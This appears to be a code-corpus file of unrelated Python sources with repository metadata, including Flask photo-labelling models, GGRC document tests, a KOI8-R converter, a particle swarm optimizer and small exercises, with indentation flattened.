ceilometer.volume.discovery.SERVICE_OPTS,)),
('storage', ceilometer.dispatcher.STORAGE_OPTS),
('vmware', ceilometer.compute.virt.vmware.inspector.OPTS),
('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS),
]
def list_keystoneauth_opts():
# NOTE(sileht): the configuration file contains only the options
# for the password plugin that handles keystone v2 and v3 API
# with discovery. But other options are possible.
return [('service_credentials', (
loading.get_auth_common_conf_options() +
loading.get_auth_plugin_conf_options('password')))]
| 0.964844 | 1 |
vktrainer/models.py | pmourlanne/VKTrainer | 0 | 12796236 | # -*- coding: utf-8 -*-
import json
import os
import random
from shutil import copyfile
from flask import url_for, current_app as app
from flask_login import UserMixin
from sqlalchemy import func, desc
# from vktrainer import db, app, login_manager
from vktrainer import db, login_manager
from vktrainer.utils import get_md5
photos = db.Table('training_set_photos',
db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')),
db.Column('photo_id', db.Integer, db.ForeignKey('photo.id'))
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
def __repr__(self):
return self.name
@classmethod
def get_or_create(cls, name):
user = cls.query.filter(cls.name == name).first()
if not user:
user = cls(name=name)
db.session.add(user)
db.session.commit()
return user, True
return user, False
@login_manager.user_loader
def load_user(userid):
return User.query.filter(User.id == userid).first()
class Photo(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
picture = db.Column(db.String(128))
md5 = db.Column(db.String(64))
PICTURES_FOLDER = 'pictures/'
@classmethod
def create_from_file(cls, file, check_if_exists=True):
# We check no photo with the same md5 already exists in db
md5 = get_md5(file)
if check_if_exists:
photo = cls.query.filter_by(md5=md5).first()
if photo is not None:
return None
# We copy the file
_, filename = os.path.split(file)
path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5)
copyfile(file, path)
name, _ = os.path.splitext(filename)
photo = Photo(name=name, md5=md5, picture=path)
db.session.add(photo)
db.session.commit()
return photo
def get_path(self):
return os.path.join(self.PICTURES_FOLDER, self.md5)
def get_absolute_url(self):
return url_for('vktrainer.show_photo', pk=self.id)
class TrainingSet(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
photos = db.dynamic_loader(
'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic'))
def __str__(self):
return self.name
def get_absolute_url(self):
return url_for('vktrainer.training_set', pk=self.id)
def get_results_url(self):
return url_for('vktrainer.training_set_results', pk=self.id)
def get_leaderboard_url(self):
return url_for('vktrainer.training_set_leaderboard', pk=self.id)
def get_results(self):
return [tr.get_pretty_result() for tr in self.training_results.all()]
def get_leaderboard(self):
count = func.count(TrainingResult.id)
return self.training_results.join(
TrainingResult.user,
).add_column(
count,
).group_by(
TrainingResult.user_id,
).order_by(
desc(count),
).values(
User.name,
count,
)
def get_percentage_done(self):
nb_photos_with_results = self.photos.filter(
Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id))
).count()
nb_photos = self.photos.count()
return float(nb_photos_with_results) / nb_photos * 100
def get_first_photo(self):
if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
return self.photos.order_by('id').first()
else:
return self._get_next_photo_semi_random(None)
def get_next_photo(self, photo):
if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
return self._get_next_photo_linear(photo)
else:
return self._get_next_photo_semi_random(photo)
def _get_next_photo_linear(self, photo):
next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first()
if not next_photo:
# We are already at the last photo, we show the first one
next_photo = self.photos.order_by('id').first()
return next_photo
def _get_previous_photo_linear(self, photo):
previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first()
if not previous_photo:
# We are already at the first photo, we show the last one
previous_photo = self.photos.order_by('-id').first()
return previous_photo
def _get_next_photo_semi_random(self, photo):
"""
We serve a random photo without any results
If there aren't any, we serve a random photo
"""
photos_without_results = self.photos.filter(~Photo.id.in_(
self.training_results.with_entities(TrainingResult.photo_id)
))
if photo:
photos_without_results = photos_without_results.filter(Photo.id != photo.id)
nb_photos_without_results = photos_without_results.count()
if nb_photos_without_results:
return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)]
else:
nb_photos = self.photos.count()
random_nb = random.randint(0, nb_photos - 1)
return self.photos.all()[random_nb]
def _get_previous_photo_semi_random(self, photo):
# Don't want to allow previous photo in semi random mode (breaks UX)
return None
class TrainingPattern(db.Model):
id = db.Column(db.Integer, primary_key=True)
training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
name = db.Column(db.String(64))
instruction = db.Column(db.Text)
training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic'))
pattern_ref = db.Column(db.String(64))
position = db.Column(db.Integer)
@property
def pattern(self):
from .patterns import REF_TO_PATTERN_CLASS
try:
return REF_TO_PATTERN_CLASS[self.pattern_ref]
except KeyError:
raise KeyError('Unknown pattern: {}'.format(self.pattern_ref))
class TrainingResult(db.Model):
id = db.Column(db.Integer, primary_key=True)
training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic'))
photo = db.relation('Photo')
user = db.relation('User', lazy='joined', backref=db.backref('training_results'))
result = db.Column(db.Text) # Result stored in JSON
photo_is_incorrect = db.Column(db.Boolean, default=False)
def get_absolute_url(self):
return url_for(
'vktrainer.training_set_result',
training_set_pk=self.training_set.id,
result_pk=self.id,
)
def get_pretty_result(self):
if self.photo_is_incorrect:
result = 'Photo marked as incorrect'
else:
try:
loaded_result = json.loads(self.result)
except ValueError:
# Could not decode JSON
loaded_result = None
if loaded_result:
result = {
'state': 'OK',
'value': loaded_result,
}
else:
result = {
'state': 'KO',
'value': {},
}
return {
'photo': {
'name': self.photo.name,
'id': self.photo.id,
},
'user': self.user.name if self.user else None,
'result': result,
'id': self.id,
'url': self.get_absolute_url(),
}
@classmethod
def create(cls, photo, training_set, user, result, **kwargs):
training_result = cls(
photo=photo,
training_set=training_set,
user=user,
result=result,
**kwargs
)
db.session.add(training_result)
db.session.commit()
return training_result
| 2.375 | 2 |
mc3/stats/prayer.py | alulujasmine/mc3 | 6 | 12796237 | <reponame>alulujasmine/mc3
# Copyright (c) 2015-2021 <NAME> and contributors.
# mc3 is open-source software under the MIT license (see LICENSE).
__all__ = [
"prayer_beads",
]
def prayer_beads(data=None, nprays=0):
"""
Implement a prayer-bead method to estimate parameter uncertainties.
Parameters
----------
data: 1D float ndarray
A time-series dataset.
nprays: Integer
Number of prayer-bead shifts. If nprays=0, set to the number
of data points.
Notes
-----
Believing in a prayer bead is a mere act of faith, please don't
do that, we are scientists for god's sake!
"""
print(
"Believing in prayer beads is a mere act of faith, please don't use it"
"\nfor published articles (see Cubillos et al. 2017, AJ, 153).")
return None
| 2.546875 | 3 |
kaldi/lm/__init__.py | mxmpl/pykaldi | 916 | 12796238 | from ._arpa_file_parser import ArpaParseOptions
from ._arpa_lm_compiler import *
from ._const_arpa_lm import *
from ._kaldi_rnnlm import *
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
| 1.242188 | 1 |
Python/CeV/Exercicios/ex38.py | WerickL/Learning | 0 | 12796239 | <filename>Python/CeV/Exercicios/ex38.py<gh_stars>0
from math import floor
n1 = float(input('Digite um número inteiro:'))
n2 = float(input('Digite outro número inteiro:'))
if floor(n1) > floor(n2):
print('O primeiro número é maior que o segundo!')
elif floor(n1) < floor(n2):
print('O segundo número é maior que o primeiro')
else:
print('Os dois números são iguais!')
| 4.09375 | 4 |
Implementations/Kattis/others/02/Impl-02-2/armystrenghteasy.py | MilladMuhammadi/Competitive-Programming | 0 | 12796240 | for i in range(int(input())):
input()
Ng,Nm = map(int,input().split())
g=list(map(int,input().split()))
m=list(map(int,input().split()))
g.sort()
m.sort()
gg,mm=0,0
while (gg<Ng and mm<Nm):
if (m[mm]<=g[gg]):
mm+=1
else:
gg+=1
if (gg==Ng):
print("MechaGodzilla")
elif (mm==Nm):
print("Godzilla")
else:
print("uncertain") | 3.296875 | 3 |
raspberrypi/python/python1_test.py | dambergn/programing-examples | 0 | 12796241 | <filename>raspberrypi/python/python1_test.py
#!/usr/bin/python
print 'Python1 Test Sucessfull' | 1.070313 | 1 |
Python/pyworkout/modules_and_packages/menu/__init__.py | honchardev/Fun | 0 | 12796242 | from menu.menu import menu | 1.0625 | 1 |
test/integration/ggrc/models/test_document.py | Killswitchz/ggrc-core | 0 | 12796243 | <reponame>Killswitchz/ggrc-core<filename>test/integration/ggrc/models/test_document.py<gh_stars>0
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Integration tests for Document"""
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc import generator
from integration.ggrc.models import factories
class TestDocument(TestCase):
"""Document test cases"""
# pylint: disable=invalid-name
def setUp(self):
super(TestDocument, self).setUp()
self.api = Api()
self.gen = generator.ObjectGenerator()
def test_update_title(self):
"""Test update document title."""
create_title = "test_title"
update_title = "update_test_title"
document = factories.DocumentFactory(title=create_title)
response = self.api.put(document, {"title": update_title})
self.assert200(response)
self.assertEqual(all_models.Document.query.get(document.id).title,
update_title)
def create_document_by_type(self, doc_type):
"""Create docuemtn with sent type."""
data = {
"title": "test_title",
"link": "test_link",
}
if doc_type is not None:
data["document_type"] = doc_type
doc_type = doc_type or all_models.Document.URL
resp, doc = self.gen.generate_object(
all_models.Document,
data
)
self.assertTrue(
all_models.Document.query.filter(
all_models.Document.id == resp.json["document"]['id'],
all_models.Document.document_type == doc_type,
).all()
)
return (resp, doc)
def test_create_url(self):
"""Test create url."""
self.create_document_by_type(all_models.Document.URL)
def test_create_url_default(self):
"""Test create url(default)."""
self.create_document_by_type(None)
def test_create_evidence(self):
"""Test create evidence."""
self.create_document_by_type(all_models.Document.ATTACHMENT)
def test_create_invalid_type(self):
"""Test validation document_type."""
data = {
"document_type": 3,
"title": "test_title",
"link": "test_link",
"owners": [self.gen.create_stub(all_models.Person.query.first())],
}
obj_name = all_models.Document._inflector.table_singular
obj = all_models.Document()
obj_dict = self.gen.obj_to_dict(obj, obj_name)
obj_dict[obj_name].update(data)
resp = self.api.post(all_models.Document, obj_dict)
self.assert400(resp)
self.assertEqual('"Invalid value for attribute document_type. '
'Expected options are `URL`, `EVIDENCE`, '
'`REFERENCE_URL`"',
resp.data)
| 2.140625 | 2 |
vdpwi/utils/preprocess.py | achyudh/castor | 132 | 12796244 | import argparse
import os
from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np
import data
def build_vector_cache(glove_filename, vec_cache_filename, vocab):
print("Building vector cache...")
with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
for line in f:
tok, vec = line.split(" ", 1)
if tok in vocab:
vocab.remove(tok)
f2.write("{} {}".format(tok, vec))
def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):
def phi(zeta):
return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)
def Phi(x):
return 0.5 * (1 + erf(x / np.sqrt(2)))
def tgt_loc_update(x):
y1 = phi((a - x) / sigma)
y2 = phi((b - x) / sigma)
x1 = Phi((b - x) / sigma)
x2 = Phi((a - x) / sigma)
denom = x1 - x2 + 1E-4
return y1 / denom - y2 / denom
x = tgt_loc
direction = np.sign(tgt_loc - (b - a))
for _ in range(n_steps):
x = tgt_loc - sigma * tgt_loc_update(x)
tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)
rrange = np.arange(a, b + 1)
pmf = tn.pdf(rrange)
pmf /= np.sum(pmf)
return pmf
def discrete_lerp(a, b, ground_truth):
pmf = np.zeros(b - a + 1)
c = int(np.ceil(ground_truth + 1E-8))
f = int(np.floor(ground_truth))
pmf[min(c - a, b - a)] = ground_truth - f
pmf[f - a] = c - ground_truth
return pmf
def smoothed_labels(truth, n_labels):
return discrete_lerp(1, n_labels, truth)
def preprocess(filename, output_name="sim_sparse.txt"):
print("Preprocessing {}...".format(filename))
with open(filename) as f:
values = [float(l.strip()) for l in f.readlines()]
values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]
with open(os.path.join(os.path.dirname(filename), output_name), "w") as f:
f.write("\n".join(values))
def add_vocab(tok_filename, vocab):
with open(tok_filename) as f:
for line in f:
vocab.update(line.strip().split())
def main():
base_conf = data.Configs.base_config()
sick_conf = data.Configs.sick_config()
sick_folder = sick_conf.sick_data
vocab = set()
for name in ("train", "dev", "test"):
preprocess(os.path.join(sick_folder, name, "sim.txt"))
add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab)
add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab)
build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)
if __name__ == "__main__":
main()
| 2.34375 | 2 |
unicode2koi8r.py | SlimyMonkey/divePython | 1 | 12796245 | <reponame>SlimyMonkey/divePython
"""Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded
This script is used during the build process of the Russian translation
of "Dive Into Python" (http://diveintopython.org/).
It takes one argument, which can be either an HTML file or a directory.
If a file, it converts the file in place; if a directory, it converts
every HTML file in the immediate directory (but not recursively).
Safe but pointless to run more than once on the same file or directory.
"""
__author__ = "<NAME> (<EMAIL>)"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 <NAME>"
__license__ = "Python"
import os
import sys
import re
unicodeToKOI8R = { \
'Ё': '\xb3',
'А': '\xe1',
'Б': '\xe2',
'В': '\xf7',
'Г': '\xe7',
'Д': '\xe4',
'Е': '\xe5',
'Ж': '\xf6',
'З': '\xfa',
'И': '\xe9',
'Й': '\xea',
'К': '\xeb',
'Л': '\xec',
'М': '\xed',
'Н': '\xee',
'О': '\xef',
'П': '\xf0',
'Р': '\xf2',
'С': '\xf3',
'Т': '\xf4',
'У': '\xf5',
'Ф': '\xe6',
'Х': '\xe8',
'Ц': '\xe3',
'Ч': '\xfe',
'Ш': '\xfb',
'Щ': '\xfd',
'Ъ': '\xff',
'Ы': '\xf9',
'Ь': '\xf8',
'Э': '\xfc',
'Ю': '\xe0',
'Я': '\xf1',
'а': '\xc1',
'б': '\xc2',
'в': '\xd7',
'г': '\xc7',
'д': '\xc4',
'е': '\xc5',
'ж': '\xd6',
'з': '\xda',
'и': '\xc9',
'й': '\xca',
'к': '\xcb',
'л': '\xcc',
'м': '\xcd',
'н': '\xce',
'о': '\xcf',
'п': '\xd0',
'р': '\xd2',
'с': '\xd3',
'т': '\xd4',
'у': '\xd5',
'ф': '\xc6',
'х': '\xc8',
'ц': '\xc3',
'ч': '\xde',
'ш': '\xdb',
'щ': '\xdd',
'ъ': '\xdf',
'ы': '\xd9',
'ь': '\xd8',
'э': '\xdc',
'ю': '\xc0',
'я': '\xd1',
'ё': '\xa3' }
unicodePattern = re.compile(r'&#[0-9]{4,4};')
charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE)
def translateMatch(match):
unicode = match.group(0)
if unicodeToKOI8R.has_key(unicode):
return unicodeToKOI8R[unicode]
else:
return unicode
def translateBuffer(buffer):
buffer = unicodePattern.sub(translateMatch, buffer)
buffer = charsetPattern.sub('KOI8-R', buffer)
return buffer
def translateFile(filename, outfilename=None):
if not outfilename:
outfilename = filename
fsock = open(filename)
buffer = fsock.read()
fsock.close()
buffer = translateBuffer(buffer)
fsock = open(outfilename, 'wb')
fsock.write(buffer)
fsock.close()
def htmlFilter(filename):
return os.path.splitext(filename)[1] == '.html'
def translateDirectory(directoryname, filterFunc=htmlFilter):
fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)]
fileList = filter(filterFunc, fileList)
map(translateFile, fileList)
if __name__ == "__main__":
name = sys.argv[1]
if os.path.isdir(name):
translateDirectory(name)
else:
translateFile(name)
| 2.71875 | 3 |
dramkit/optimizer/pso.py | Genlovy-Hoo/dramkit | 0 | 12796246 | <reponame>Genlovy-Hoo/dramkit
# -*- coding: utf-8 -*-
import time
import numpy as np
from dramkit.gentools import isnull
from dramkit.optimizer.utils_heuristic import rand_init
def pso(objf, func_opter_parms):
'''
粒子群优化算法(Particle Swarm Optimization) PSO algorithm
TODO
----
目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况
Parameters
----------
objf : function
目标函数。注:须事先转化为求极小值问题
func_opter_parms : FuncOpterInfo
:class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类,
须设置parms_func、parms_opter、parms_log
| parms_func为目标函数参数信息dict,key须包含:
| x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim
| x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim
| dim: 自变量维度数
| kwargs: 目标函数接收的其它参数
| parms_opter: 优化函数参数信息dict,key须包含:
| popsize: 群体数量(每轮迭代的样本数量)
| max_iter: 最大迭代寻优次数
| v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim
| w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强
| w_min: 惯性因子最小值
| w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新
| 默认动态更新w时采用线性递减方法
| c1, c2: 学习因子
| parms_log: 日志参数信息dict,key须包含:
| logger: 日志记录器
| nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值
Returns
-------
func_opter_parms : FuncOpterInfo
更新优化过程之后的func_opter_parms
References
----------
- https://www.jianshu.com/p/8c0260c21af4
- https://github.com/7ossam81/EvoloPy
'''
# 参数提取
opter_name = func_opter_parms.parms_opter['opter_name']
if opter_name == '' or isnull(opter_name):
opter_name = 'pso'
func_opter_parms.parms_opter['opter_name'] = opter_name
# 目标函数参数
x_lb = func_opter_parms.parms_func['x_lb']
x_ub = func_opter_parms.parms_func['x_ub']
dim = func_opter_parms.parms_func['dim']
kwargs = func_opter_parms.parms_func['kwargs']
# 优化器参数
popsize = func_opter_parms.parms_opter['popsize']
max_iter = func_opter_parms.parms_opter['max_iter']
v_maxs = func_opter_parms.parms_opter['v_maxs']
w_max = func_opter_parms.parms_opter['w_max']
w_min = func_opter_parms.parms_opter['w_min']
w_fix = func_opter_parms.parms_opter['w_fix']
c1 = func_opter_parms.parms_opter['c1']
c2 = func_opter_parms.parms_opter['c2']
# 日志参数
logger = func_opter_parms.parms_log['logger']
nshow = func_opter_parms.parms_log['nshow']
# 时间记录
strt_tm = time.time()
func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S'))
# 边界统一为列表
if not isinstance(x_lb, list):
x_lb = [x_lb] * dim
if not isinstance(x_ub, list):
x_ub = [x_ub] * dim
if not isinstance(v_maxs, list):
if isnull(v_maxs):
v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)]
else:
v_maxs = [v_maxs] * dim
v_mins = [-x for x in v_maxs]
# 初始化
vel = np.zeros((popsize, dim)) # 初始速度
pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值
pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大
pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解
gBest = np.zeros(dim) # 保存全局最优解
gBestVal = float('inf') # 全局最优值
pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化
# 保存收敛过程
convergence_curve = np.zeros(max_iter) # 全局最优值
convergence_curve_mean = np.zeros(max_iter) # 平均值
# 迭代寻优
for l in range(0, max_iter):
# 位置过界处理
pos = np.clip(pos, x_lb, x_ub)
fvals_mean = 0
for i in range(0, popsize):
fval = objf(pos[i, :], **kwargs) # 目标函数值
fvals_mean = (fvals_mean*i + fval) / (i+1)
# 更新每个个体的最优解(理解为局部最优解)
if pBestVals[i] > fval:
pBestVals[i] = fval
pBest[i, :] = pos[i, :].copy()
# 更新全局最优解
if gBestVal > fval:
gBestVal = fval
gBest = pos[i, :].copy()
# 更新w(w为惯性因子,值越大全局寻优能力更强)
if not w_fix:
# w采用线型递减方式动态更新,也可采用其它方式更新
w = w_max - l * ((w_max - w_min) / max_iter)
else:
if not 0 < w_fix < 1:
raise ValueError('固定惯性因子w范围应该在(0, 1)内!')
w = w_fix
# # 速度和位置更新
# for i in range(0, popsize):
# for j in range (0, dim):
# r1 = random.random()
# r2 = random.random()
# # 速度更新
# vel[i, j] = w * vel[i, j] + \
# c1 * r1 * (pBest[i, j] - pos[i,j]) + \
# c2 * r2 * (gBest[j] - pos[i, j])
# # 速度过界处理
# if vel[i, j] > v_maxs[j]:
# vel[i, j] = v_maxs[j]
# if vel[i, j] < v_mins[j]:
# vel[i, j] = v_mins[j]
# # 位置更新
# pos[i, j] = pos[i, j] + vel[i, j]
# 速度和位置更新
r1 = np.random.random(size=(popsize, dim))
r2 = np.random.random(size=(popsize, dim))
# 速度更新
vel = w * vel + c1 * r1 * (pBest - pos) + c2 * r2 * (gBest - pos)
vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理
pos = pos + vel # 位置更新
# 每轮迭代都保存最优目标值
convergence_curve[l] = gBestVal
convergence_curve_mean[l] = fvals_mean
if nshow:
if (l+1) % nshow ==0:
opter_name = func_opter_parms.parms_opter['opter_name']
func_name = func_opter_parms.parms_func['func_name']
logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \
'best fval: {}'.format(gBestVal))
# 更新func_opter_parms
end_tm = time.time()
func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S'))
func_opter_parms.set_exe_time(end_tm-strt_tm)
func_opter_parms.set_convergence_curve(convergence_curve)
func_opter_parms.set_convergence_curve_mean(convergence_curve_mean)
func_opter_parms.set_best_val(gBestVal)
func_opter_parms.set_best_x(gBest)
return func_opter_parms
if __name__ == '__main__':
import pandas as pd
from dramkit.optimizer.base_funcs import TestFuncs
from dramkit.optimizer.utils_heuristic import FuncOpterInfo
from dramkit import plot_series, simple_logger
from dramkit.logtools.logger_general import get_logger
from dramkit.logtools.utils_logger import close_log_file
strt_tm = time.time()
objf = TestFuncs.ackley
parms_func = {'func_name': objf.__name__,
'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}}
parms_opter = {'opter_name': 'pso-test',
'popsize': 30, 'max_iter': 500,
'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False,
'c1': 2, 'c2': 2}
# logger = simple_logger()
logger = get_logger('./test/log/pso_test.txt', screen_show=True)
# parms_log = {'logger': logger, 'nshow': 10}
parms_log = {'logger': logger, 'nshow': 100}
func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log)
func_opter_parms = pso(objf, func_opter_parms)
vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve,
'fval_mean': func_opter_parms.convergence_curve_mean})
plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6))
best_x = func_opter_parms.best_x
func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x))
close_log_file(logger)
print('used time: {}s.'.format(round(time.time()-strt_tm, 6)))
| 2.109375 | 2 |
PythonTest/t32.py | Hyyyyyyyyyy/acm | 0 | 12796247 | <gh_stars>0
the_count = [1,2,3,4,5]
fruits = ['apple','orange','pear','apricot']
change = [1,'pennies',2,'dimes',3,'quarters']
for num in the_count:
print "This is count %d" % num
for i in fruits:
print "A fruit of type: %s" % i
for i in change:
print "I got %r" % i
elements = []
j = "5"
for i in range(0, 6):
print "Adding ", i, j, " to the list"
elements.append(i)
for i in elements:
print "Element was : %d" % i
| 3.6875 | 4 |
RecoLocalTracker/SubCollectionProducers/python/ClusterMultiplicityFilter_cfi.py | ckamtsikis/cmssw | 852 | 12796248 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter",
MaxNumberOfClusters = cms.uint32(300),
ClusterCollection = cms.InputTag('siStripClusters')
)
| 1.15625 | 1 |
src/lib/pytch/actor.py | Liampobob/pytch-vm | 0 | 12796249 | <gh_stars>0
from pytch.syscalls import (
play_sound,
registered_instances,
wait_seconds,
)
from pytch.project import FRAMES_PER_SECOND
def _is_number(x):
return isinstance(x, int) or isinstance(x, float)
class Actor:
Sounds = []
_appearance_names = None
def start_sound(self, sound_name):
play_sound(self, sound_name, False)
def play_sound_until_done(self, sound_name):
play_sound(self, sound_name, True)
@classmethod
def ensure_have_appearance_names(cls):
if cls._appearance_names is None:
cls._appearance_names = [
appearance.label for appearance in cls._Appearances
]
def switch_appearance(self, appearance_name_or_index):
self.ensure_have_appearance_names()
if isinstance(appearance_name_or_index, str):
appearance_name = appearance_name_or_index
if appearance_name not in self._appearance_names:
raise KeyError('could not find {} "{}" in class "{}"'
.format(self._appearance_hyponym,
appearance_name,
self.__class__.__name__))
self._appearance_index = self._appearance_names.index(appearance_name)
elif isinstance(appearance_name_or_index, int):
appearance_index = appearance_name_or_index
if appearance_index < 0:
raise ValueError(
('could not switch to {} number {} in class "{}":'
' number can not be negative')
.format(self._appearance_hyponym,
appearance_index,
self.__class__.__name__))
n_appearances = len(self._appearance_names)
if appearance_index >= n_appearances:
raise ValueError(
('could not switch to {} number {} in class "{}":'
' it only has {} {0}s')
.format(self._appearance_hyponym,
appearance_index,
self.__class__.__name__,
n_appearances))
self._appearance_index = appearance_index
else:
raise ValueError(
('could not switch {} in class "{}":'
' argument must be string or integer')
.format(self._appearance_hyponym,
self.__class__.__name__))
def next_appearance(self, n_steps):
if not isinstance(n_steps, int):
raise ValueError("n_steps must be integer")
if len(self._Appearances) == 0:
raise ValueError(
('could not move to next {} in class "{}":'
' it has no {0}s')
.format(self._appearance_hyponym, self.__class__.__name__)
)
self._appearance_index += n_steps
self._appearance_index %= len(self._Appearances)
@property
def appearance_number(self):
return self._appearance_index
@property
def appearance_name(self):
self.ensure_have_appearance_names()
return self._appearance_names[self._appearance_index]
class Sprite(Actor):
Costumes = [
('question-mark',
'question-mark.png', 16, 16),
]
_appearance_hyponym = 'Costume'
def __init__(self):
self._x = 0
self._y = 0
self._size = 1.0
self._speech = None
at_least_one_Costume = len(self._Appearances) != 0
if hasattr(self, "start_shown"):
if self.start_shown and not at_least_one_Costume:
raise ValueError("start_shown is set,"
" but there are no Costumes")
self._shown = self.start_shown
else:
self._shown = at_least_one_Costume
if at_least_one_Costume:
self._appearance_index = 0
else:
# It is not necessarily an error to have no Costumes, as
# long as the Sprite always remains hidden. It might, for
# example, only receive/broadcast messages or play sounds.
self._appearance_index = None
@classmethod
def the_original(cls):
return registered_instances(cls)[0]
@classmethod
def all_clones(cls):
return registered_instances(cls)[1:]
@classmethod
def all_instances(cls):
return registered_instances(cls)
def go_to_xy(self, x, y):
self._x = x
self._y = y
def get_x(self):
return self._x
def set_x(self, x):
self._x = x
def change_x(self, dx):
self._x += dx
def get_y(self):
return self._y
def set_y(self, y):
self._y = y
def change_y(self, dy):
self._y += dy
def glide_to_xy(self, destination_x, destination_y, seconds):
destination_is_number = (
_is_number(destination_x) and _is_number(destination_y)
)
if not destination_is_number:
raise ValueError("destination coordinates must be numbers")
if not _is_number(seconds):
raise ValueError("'seconds' must be a number");
if seconds < 0:
raise ValueError("'seconds' cannot be negative")
n_frames = max(int(seconds * FRAMES_PER_SECOND), 1)
start_x = self._x
start_y = self._y
# On completion, we must be exactly at the target, and we want
# the first frame to involve some movement, so count from 1 up
# to n_frames (inclusive) rather than 0 up to n_frames - 1.
for frame_idx in range(1, n_frames + 1):
t = frame_idx / n_frames # t is in (0.0, 1.0]
t_c = 1.0 - t # 'complement'
x = t * destination_x + t_c * start_x
y = t * destination_y + t_c * start_y
self.go_to_xy(x, y)
wait_seconds(0) # No auto-yield (we don't do "import pytch")
def set_size(self, size):
self._size = size
def show(self):
if not self.Costumes:
# See comment in __init__().
raise RuntimeError('cannot show a Sprite with no Costumes')
self._shown = True
def hide(self):
self._shown = False
def switch_costume(self, costume_name):
self.switch_appearance(costume_name)
def next_costume(self, n_steps=1):
self.next_appearance(n_steps)
@property
def costume_number(self):
return self.appearance_number
@property
def costume_name(self):
return self.appearance_name
def touching(self, target_class):
return (self._pytch_parent_project
.instance_is_touching_any_of(self, target_class))
def delete_this_clone(self):
self._pytch_parent_project.unregister_actor_instance(self)
def move_to_front_layer(self):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "absolute", -1))
def move_to_back_layer(self):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "absolute", 0))
def move_forward_layers(self, n_layers):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "relative", n_layers))
def move_backward_layers(self, n_layers):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "relative", -n_layers))
def say(self, content):
self._speech = ("say", content)
def say_nothing(self):
self._speech = None
def say_for_seconds(self, content, seconds):
self.say(content)
wait_seconds(seconds)
self.say_nothing()
class Stage(Actor):
Backdrops = [('solid-white', 'solid-white-stage.png')]
_x = 0
_y = 0
_size = 1.0
_shown = True
_speech = None
_appearance_hyponym = 'Backdrop'
def __init__(self):
if not self.Backdrops:
# In contrast to Sprites, a Stage is always shown and so
# must have at least one Backdrop.
raise ValueError('no Backdrops in Stage')
self._appearance_index = 0
@classmethod
def the_only(cls):
return registered_instances(cls)[0]
def switch_backdrop(self, backdrop_name):
self.switch_appearance(backdrop_name)
def next_backdrop(self, n_steps=1):
self.next_appearance(n_steps)
@property
def backdrop_number(self):
return self.appearance_number
@property
def backdrop_name(self):
return self.appearance_name
| 2.5 | 2 |
setup.py | CSCfi/beacon-network | 3 | 12796250 | <reponame>CSCfi/beacon-network<gh_stars>1-10
